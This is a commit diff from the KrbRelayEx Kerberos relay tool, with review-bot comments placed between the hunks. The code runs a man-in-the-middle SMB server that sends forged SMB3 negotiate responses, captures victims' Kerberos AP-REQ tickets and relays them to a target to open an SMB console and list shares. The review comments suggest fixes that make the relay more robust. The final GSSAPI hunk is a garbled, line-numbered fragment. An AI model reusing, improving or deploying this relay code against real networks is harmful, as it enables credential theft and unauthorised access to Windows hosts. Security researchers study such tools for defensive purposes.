
Commit 17dfc18

author
Andrea Pierini
committed
V 1.1 - bug fixes
1 parent ef104cb commit 17dfc18

597 files changed

Lines changed: 4579 additions & 3196 deletions


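--- a/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
+++ b/KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs
@@ -32,7 +32,7 @@ class SMBCommandSocketConsole
 
 public byte[] apreqBuffer;
 public FakeSMBServer currSocketServer;
-public async Task Start(int port, State state, byte[] buffer)
+public async Task Start(int port, State state, byte[] buffer)
 {
 // Define the IP address and port
 
@@ -45,33 +45,33 @@ public async Task Start(int port, State state, byte[] buffer)
 {
 // Start the listener
 listener.Start();
-Console.WriteLine("[*] SMB Console Server started on any:{0}. Waiting for connections...", port);
+Console.WriteLine("[*] SMB Console Server started on [any:{0}]. Waiting for connections...", port);
 
 //while (true)
 {
 // Accept a client socket
 //Socket clientSocket = listener.AcceptTcpClientAsync(); // AcceptSocket(); //AcceptTcpClientAsync()
 TcpClient clientSocket = await listener.AcceptTcpClientAsync();
-
-
-Console.WriteLine("[*] SMB Console Server connected client:{0}", clientSocket.Client.RemoteEndPoint);
+
+
+Console.WriteLine("[*] SMB Console Server connected client: [{0}]", clientSocket.Client.RemoteEndPoint);
 SMBLibrary.Client.SMB2Client smbc = new SMB2Client();
 //smbc.curSocketServer = currSocketServer;
 KrbRelay.Clients.Smb smb2 = new Smb(clientSocket.Client);
 //smbc.currSourceSocket = state.SourceSocket;
 //smbc.currDestSocket = state.TargetSocket;
 //smbc.ServerType = State.ServerType;
-smbc.curSocketServer = currSocketServer;
+//smbc.curSocketServer = currSocketServer;
 bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
 if (!isConnected)
 {
-Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
+Console.WriteLine("[-] Could not connect to [{0}:445]", Program.targetFQDN);
 
 }
 
 
 
-Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
+Console.WriteLine("[*] SMB relay Connected to: [{0}:445]", Program.targetFQDN);
 //state.isRelayed = true;
 //Task.Run(() => smb2.smbConnect(smbc));
 Task.Run(() => smb2.smbConnect(smbc, buffer));
@@ -141,6 +141,20 @@ public class FakeSMBServer
 0x13,0x09,0x93,0x27,0xdb,0x6e,0x41,0xee,0xf8,0x14,0x45,0x6e,0xdb,0xfa,0x09,0x8c,
 0x14,0x87,0xf9,0x4c,0x14,0x73,0xca,0xbd,0xe5,0x20,0x00,0x00,0x02,0x00,0x04,0x00,
 0x00,0x00,0x00,0x00,0x01,0x00,0x02,0x00};
+byte[] smb3NegotiateProtocolResponse = new byte[] {0x00, 0x00, 0x01, 0x74, 0xFE, 0x53, 0x4D, 0x42, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00,
+0x01, 0x00, 0x11, 0x03, 0x05, 0x00, 0x93, 0x6D, 0x4F, 0xE8, 0xB6, 0xD9, 0x23, 0x4A, 0xB5, 0x33, 0x05, 0x98, 0x82, 0xA8, 0xE3, 0xAE, 0x2F, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0xED, 0x25, 0x57, 0x35, 0x15, 0x40, 0xDB, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00,
+0x78, 0x00, 0xF8, 0x00, 0x00, 0x00, 0x60, 0x76, 0x06, 0x06, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x02, 0xA0, 0x6C, 0x30, 0x6A, 0xA0, 0x3C, 0x30, 0x3A, 0x06, 0x0A, 0x2B, 0x06,
+0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1E, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x82, 0xF7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x12, 0x01,
+0x02, 0x02, 0x06, 0x0A, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x12, 0x01, 0x02, 0x02, 0x03, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0A, 0xA3, 0x2A,
+0x30, 0x28, 0xA0, 0x26, 0x1B, 0x24, 0x6E, 0x6F, 0x74, 0x5F, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x64, 0x5F, 0x69, 0x6E, 0x5F, 0x52, 0x46, 0x43, 0x34, 0x31, 0x37, 0x38,
+0x40, 0x70, 0x6C, 0x65, 0x61, 0x73, 0x65, 0x5F, 0x69, 0x67, 0x6E, 0x6F, 0x72, 0x65, 0x01, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x01, 0x00,
+0x72, 0x84, 0xBE, 0xA6, 0x02, 0x97, 0x90, 0xA5, 0xBA, 0x06, 0xCB, 0xF0, 0xF3, 0x7E, 0xFD, 0x60, 0x01, 0x21, 0x66, 0xB8, 0x88, 0x25, 0xE9, 0x55, 0xB0, 0xBD, 0x2C, 0x4A,
+0x2C, 0x95, 0x52, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
+0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00};
 
 
 public FakeSMBServer(int listenPort, string targetHost, int targetPort)
@@ -168,7 +182,8 @@ public FakeSMBServer(int listenPort, string targetHost, int targetPort, string s
 }
 public void Start(bool fwd)
 {
-Console.WriteLine("[*] Starting FakeSMBServer on port:{0}", _listenPort);
+ForwardOnly = fwd;
+Console.WriteLine($"[*] Starting MiTMServer on port:[{_listenPort}] {(ForwardOnly ? "(Forward Only mode)" : "")} ");
 _listenerSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
 _listenerSocket.Bind(new IPEndPoint(IPAddress.Any, _listenPort));
 _listenerSocket.Listen(100); // Allow up to 100 pending connections
@@ -177,14 +192,14 @@ public void Start(bool fwd)
 _isRunning = true;
 _listenerSocket.BeginAccept(OnClientConnect, null);
 
-ForwardOnly = fwd;
+
 
 }
 public void Stop()
 {
 if (_isRunning)
 {
-Console.WriteLine("[*] Stopping FakeSMBServer on port:{0}", _listenPort);
+Console.WriteLine("[*] Stopping MiTMServer on port:[{0}]", _listenPort);
 _isRunning = false;
 
 // Stop listening for new connections
@@ -198,13 +213,13 @@ public void Stop()
 
 _activeConnections.Clear();
 
-Console.WriteLine("[*] FakeSMBServer {0} stopped.", _listenPort);
+Console.WriteLine("[*] MiTMServer [{0}] stopped.", _listenPort);
 }
 }
 
 public void ListConnectedClients()
 {
-Console.WriteLine("\n[*] Connected Clients on port:{0}", _listenPort);
+Console.WriteLine("\n[*] Connected Clients on port:[{0}]", _listenPort);
 foreach (var key in _activeConnections.Keys)
 {
 Console.WriteLine($"- {key}");
@@ -221,7 +236,7 @@ private void OnClientConnect(IAsyncResult ar)
 // Create a unique key for this connection
 string clientKey = $"{clientSocket.RemoteEndPoint}-{Guid.NewGuid()}";
 
-Console.WriteLine($"[*] FakeSMBServer:{_listenPort} -> Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
+Console.WriteLine($"[*] MiTMServer [{_listenPort}]: Client connected [{clientSocket.RemoteEndPoint}] in {(Program.forwdardmode ? "FORWARD" : "RELAY")} mode.", _listenPort);
 
 // Create a new connection to the target server
 Socket targetSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -268,25 +283,25 @@ private void OnDataFromClient(IAsyncResult ar)
 Program.forwdardmode = true;
 
 state.isRelayed = true;
-Console.WriteLine("[*] FakeSMBServer {0}: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
+Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
 state.SourceSocket.Send(smbNegotiateProtocolResponse, smbNegotiateProtocolResponse.Length, SocketFlags.None);
 l = state.SourceSocket.Receive(buffer);
-Console.WriteLine("[*] FakeSMBServer {0}: sending smb2NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
-state.SourceSocket.Send(smb2NegotiateProtocolResponse, smb2NegotiateProtocolResponse.Length, SocketFlags.None);
+Console.WriteLine("[*] MiTMServer [{0}]: sending smb3NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
+state.SourceSocket.Send(smb3NegotiateProtocolResponse, smb3NegotiateProtocolResponse.Length, SocketFlags.None);
 l = state.SourceSocket.Receive(buffer);
 //int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
 buffer = buffer.Skip(4).ToArray();
 Program.apreqBuffer = Program.ExtractSecurityBlob(buffer);
 if (!(Program.apreqBuffer[0] == 0x60 && Program.apreqBuffer[1] == 0x82))
 {
-Console.WriteLine("[-] FakeSMBServer {0}: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
+Console.WriteLine("[-] MiTMServer [{0}]: Could not find AP-REQ, maybe using NTLM?", state.SourceSocket.RemoteEndPoint);
 state.isRelayed = false;
 
-//CloseConnection(state);
+CloseConnection(state);
 return;
 
 }
-Console.WriteLine("[*] FakeSMBServer {0}: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
+Console.WriteLine("[*] MiTMServer [{0}]: Got AP-REQ for : {1}/{2}", state.SourceSocket.RemoteEndPoint, Program.service, Program.targetFQDN);
 
 
 
@@ -300,9 +315,9 @@ private void OnDataFromClient(IAsyncResult ar)
 
 SMBCommandSocketConsole smbs = new SMBCommandSocketConsole();
 smbs.currSocketServer = null;
-Console.WriteLine("[*] FakeSMBServer {0}: SMB relay socket console Connected to: {1}:445", state.SourceSocket.RemoteEndPoint, Program.targetFQDN);
+Console.WriteLine("[*] MiTMServer [{0}]: SMB relay socket console Connected to: [{1}:445]", state.SourceSocket.RemoteEndPoint, Program.targetFQDN);
 Task.Run(() => smbs.Start(Program.bgconsoleStartPort++, state, Program.apreqBuffer));
-
+
 state.isRelayed = false;
 
 CloseConnection(state);
@@ -319,16 +334,16 @@ private void OnDataFromClient(IAsyncResult ar)
 smbc.currDestSocket = state.TargetSocket;
 smbc.ServerType = ServerType;
 smbc.curSocketServer = this;
-bool isConnected = smbc.Connect(Program.RedirectHost, SMBTransportType.DirectTCPTransport);
+bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost) , SMBTransportType.DirectTCPTransport);
 if (!isConnected)
 {
-Console.WriteLine("[-] Could not connect to {0}:445", Program.targetFQDN);
+Console.WriteLine("[-] Could not connect to [{0}:445]", Program.RedirectHost);
 
 }
 
 
 state.isRelayed = false;
-Console.WriteLine("[*] SMB relay Connected to: {0}:445", Program.targetFQDN);
+Console.WriteLine("[*] SMB relay Connected to: [{0}:445]", Program.targetFQDN);
 
 
 Task.Run(() => smb2.smbConnect(smbc, Program.apreqBuffer));
@@ -465,4 +480,4 @@ public void CloseConnection(State state)
 //Console.WriteLine($"Error closing connection: {ex.Message}");
 }
 }
-}
+}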
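Review bot: `IPAddress.Parse(Program.RedirectHost)` on the new Connect line in OnDataFromClient throws FormatException when RedirectHost is a hostname rather than an IP literal, and because this runs inside a BeginReceive callback there is no caller to observe that exception; the equivalent Connect in SMBCommandSocketConsole.Start (first hunk) still passes the raw string, so the two relay paths now accept different forms of the same setting. The `if (!isConnected)` block just below it only prints the error and then falls through to the "SMB relay Connected" message and `Task.Run(() => smb2.smbConnect(smbc, Program.apreqBuffer))` on a client that never connected. Guarding the parse and returning on either failure, presumably with the same `CloseConnection(state); return;` sequence the AP-REQ check in this method already uses, keeps the connection from being handed to the relay in a half-initialised state. OnDataFromClient begins and ends outside the hunk.
```csharp
smbc.curSocketServer = this;
if (!IPAddress.TryParse(Program.RedirectHost, out IPAddress redirectAddress))
{
    Console.WriteLine("[-] RedirectHost [{0}] is not an IP address", Program.RedirectHost);
    CloseConnection(state);
    return;
}
bool isConnected = smbc.Connect(redirectAddress, SMBTransportType.DirectTCPTransport);
if (!isConnected)
{
    Console.WriteLine("[-] Could not connect to [{0}:445]", Program.RedirectHost);
    CloseConnection(state);
    return;
}
// … unchanged: state.isRelayed = false, "SMB relay Connected" message, Task.Run(smb2.smbConnect) …
```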

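--- a/KrbRelayEx/Clients/Attacks/Smb/Shares.cs
+++ b/KrbRelayEx/Clients/Attacks/Smb/Shares.cs
@@ -331,14 +331,16 @@ public static void smbConsole(SMB2Client smbClient, Socket clientSocket = null,
 public static void listShares(SMB2Client smbClient)
 {
 //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/8605fd54-6ede-4316-b30d-ecfafa133c1d
-List<ShareInfo2Entry> shares = smbClient.ListShares(out var status);
+List<string> shares = smbClient.ListShares(out var status);
 if (status == NTStatus.STATUS_SUCCESS)
 {
 Shares.Output("Name Path\n");
 Shares.Output("---- ----\n");
 foreach (var s in shares)
 {
-Shares.Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
+
+//Shares.Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
+Shares.Output(String.Format("{0, -12} {1}\n", s, s));
 }
 }
 else
@@ -562,6 +564,7 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
 isConnected = true;
 clientSocket = cSocket;
 ISMBFileStore fileStore = smbClient.TreeConnect(share, out var status);
+Console.WriteLine("[*] SMB Console Status:{0}", status);
 if (status == NTStatus.STATUS_SUCCESS)
 {
 while (isConnected)
@@ -676,14 +679,15 @@ public void smbConsole(SMB2Client smbClient, Socket cSocket = null, string share
 public void listShares(SMB2Client smbClient)
 {
 //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/8605fd54-6ede-4316-b30d-ecfafa133c1d
-List<ShareInfo2Entry> shares = smbClient.ListShares(out var status);
+//SMBLibrary.Services.ShareInfo2Entry shares = smbClient.ListShares(out NTStatus status);
+List<string> shares = smbClient.ListShares(out NTStatus status);
 if (status == NTStatus.STATUS_SUCCESS)
 {
 Output("Name Path\n");
 Output("---- ----\n");
 foreach (var s in shares)
 {
-Output(String.Format("{0, -12} {1}\n", s.NetName.Value, s.Path.Value));
+Output(String.Format("{0, -12} {1}\n", s, s));
 }
 }
 else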
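Review bot: With `ListShares` now returning `List<string>`, the new `String.Format("{0, -12} {1}\n", s, s)` in the first hunk prints the share name in both columns while the header two lines above still reads `Name Path`, so the Path column shows data that is not a path; the instance `listShares` in the third hunk has the same line. Either print only the name and shorten the two header lines to match (`Output("Name\n"); Output("----\n"); Output(s + "\n");`), or keep the column and fill it from whatever call actually yields the path. The commented-out `s.NetName.Value` line and the stray blank line added in the first hunk should be removed rather than kept, since the old form no longer compiles against the new return type.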

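--- a/KrbRelayEx/Program.cs
+++ b/KrbRelayEx/Program.cs
@@ -39,7 +39,7 @@ namespace KrbRelay
 internal class Program
 {
 
-public const string Version = "V1.0";
+public const string Version = "V1.1";
 public static string DcomHost = "";
 public static string RedirectHost = "";
 public static string FakeSPN = "";
@@ -219,13 +219,6 @@ private static void PrintBanner()
 Console.WriteLine("██╔═██╗ ██╔══██╗██╔══██╗██╔══██╗██╔══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔██");
 Console.WriteLine("██║ ██╗██║ ██║██████╔╝██║ ██║███████╗███████╗██║ ██║ ██║ ███████╗██╔╝ ██╗");
 Console.WriteLine("╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝");
-
-}
-private static void ShowHelp()
-{
-
-
-PrintBanner();
 Console.WriteLine("\r\r################################################################################");
 Console.WriteLine("# #");
 Console.WriteLine("# KrbRelayEx by @decoder_it #");
@@ -238,6 +231,14 @@ private static void ShowHelp()
 Console.WriteLine("# #");
 Console.WriteLine("################################################################################");
 
+}
+private static void ShowHelp()
+{
+
+
+
+
+
 Console.WriteLine();
 Console.WriteLine("Description:");
 
@@ -308,18 +309,19 @@ private static void ShowHelp()
 }
 
 
-
 
 
 
-public static void Main(string[] args)
+public static async Task Main(string[] args)
+//public static void Main(string[] args)
 {
 
 
 
 bool show_help = false;
-
+
 //Guid clsId_guid = new Guid();
+PrintBanner();
 
 foreach (var entry in args.Select((value, index) => new { index, value }))
 {
@@ -576,7 +578,7 @@ public static void Main(string[] args)
 foreach (string item in RedirectPorts)
 {
 
-tcpForwarders.Add(new FakeSMBServer(int.Parse(item), RedirectHost, int.Parse(item)));
+tcpForwarders.Add(new FakeSMBServer(int.Parse(item), RedirectHost, int.Parse(item),item));
 }
 foreach (FakeSMBServer item in tcpForwarders)
 {
@@ -589,14 +591,14 @@ public static void Main(string[] args)
 
 
 Console.WriteLine("[*] Hit 'q' for quit, 'r' for restarting Relaying and Port Forwarding, 'l' for listing connected clients");
-
+
 while (true)
 {
-
+
 if (Console.KeyAvailable)
 {
-
-ConsoleKeyInfo key = Console.ReadKey(intercept: true);
+
+ConsoleKeyInfo key = Console.ReadKey(intercept: true);
 if (key.KeyChar == 'q')
 return;
 
@@ -605,21 +607,19 @@ public static void Main(string[] args)
 SMBtcpFwd.ListConnectedClients();
 
 }
-
+
 if (key.KeyChar == 'r')
 {
 Console.WriteLine("[!] Restarting Relay...");
-
+
 SMBtcpFwd.Stop();
 forwdardmode = false;
 SMBtcpFwd.Start(false);
 
 }
-else
-{
-Thread.Sleep(500);
-}
+
 }
+Thread.Sleep(500);
 }
 
 }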
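Review bot: The modified `tcpForwarders.Add(new FakeSMBServer(int.Parse(item), RedirectHost, int.Parse(item),item))` line still calls `int.Parse` twice on each RedirectPorts entry, so a non-numeric or out-of-range value aborts startup with an unhandled FormatException or OverflowException instead of a message naming the bad option; `if (!int.TryParse(item, out int port) || port is < 1 or > 65535) { Console.WriteLine("[-] Invalid redirect port: [{0}]", item); return; }` followed by `tcpForwarders.Add(new FakeSMBServer(port, RedirectHost, port, item));` parses once and reports the value. The fourth constructor argument is the same port string, which looks intended given the `string s…` parameter visible in the SMBSockets.cs hunk header, but a one-line comment on what that parameter is used for would help. Separately, `Main` became `async Task` in the ShowHelp hunk while none of the visible lines await anything; if no `await` exists in the part of the body outside these hunks the compiler will warn (CS1998) and the method runs synchronously, so either add the awaited call the change was meant for or revert the signature. Main begins and ends outside the hunks.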
Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,19 +1,20 @@
1+
using System;
2+
13
namespace SMBLibrary.Authentication.GSSAPI
24
{
35
public enum GSSAttributeName
46
{
57
AccessToken,
68
DomainName,
79
IsAnonymous,
8-
10+
911
/// <summary>
1012
/// Permit access to this user via the guest user account if the normal authentication process fails.
1113
/// </summary>
1214
IsGuest,
13-
1415
MachineName,
1516
OSVersion,
1617
SessionKey,
1718
UserName,
1819
}
19-
}
20+
}
